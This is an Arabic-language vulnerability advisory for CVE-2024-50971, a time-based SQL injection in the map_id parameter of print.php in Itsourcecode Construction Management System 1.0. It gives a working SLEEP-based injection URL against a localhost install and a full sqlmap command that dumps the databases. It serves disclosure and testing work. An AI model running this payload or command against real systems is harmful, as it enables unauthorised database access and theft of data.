CVE-2024-50971
الوصف
تسمح ثغرة حقن SQL في ملف print.php الخاص بنظام إدارة الإنشاءات Itsourcecode الإصدار 1.0 للمهاجمين عن بُعد بتنفيذ أوامر SQL تعسفية عبر المعامل map_id.
نوع الثغرة
حقن SQL
البائع
Itsourcecode
قاعدة الكود المتأثر:
https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/ - 1.0
المكون المتأثر:
نظام إدارة الإنشاءات Itsourcecode v1.0 معرض لحقن SQL من خلال المعامل map_id في صفحة print.php.
نواقل الهجوم:
- قم بإعداد التطبيق محليًا، وسجل حسابًا، ثم سجل الدخول باستخدام بيانات المشرف admin:admin
- انتقل إلى عنوان URL التالي في متصفحك:
http://localhost/monitoring_system/print.php?map_id=67
- حقن حمولة SQL:
قم بتعديل المعامل map_id في عنوان URL لإدراج حمولة حقن SQL زمنية.
http://localhost/monitoring_system/print.php?map_id=67'+AND+(SELECT+1386+FROM+(SELECT(SLEEP(15)))LhJj)--+byxm
- لاحظ استجابة التطبيق:
يجب أن يستغرق تحميل الصفحة وقتًا أطول بشكل ملحوظ (15 ثانية) إذا كان الحقن ناجحًا، مما يؤكد أن المعامل map_id معرض لحقن SQL.
- استخدم الآن أداة SQLMap لمزيد من الاستغلال وتفريغ قواعد البيانات باستخدام الأمر التالي:
sqlmap.py -u http://localhost/monitoring_system/print.php?map_id=67 --risk 3 --level 3 --cookie="PHPSESSID=your_cookie_here" --dbs --technique=T --dump --no-cast
المراجع:
- https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/
- https://owasp.org/www-community/attacks/SQL_Injection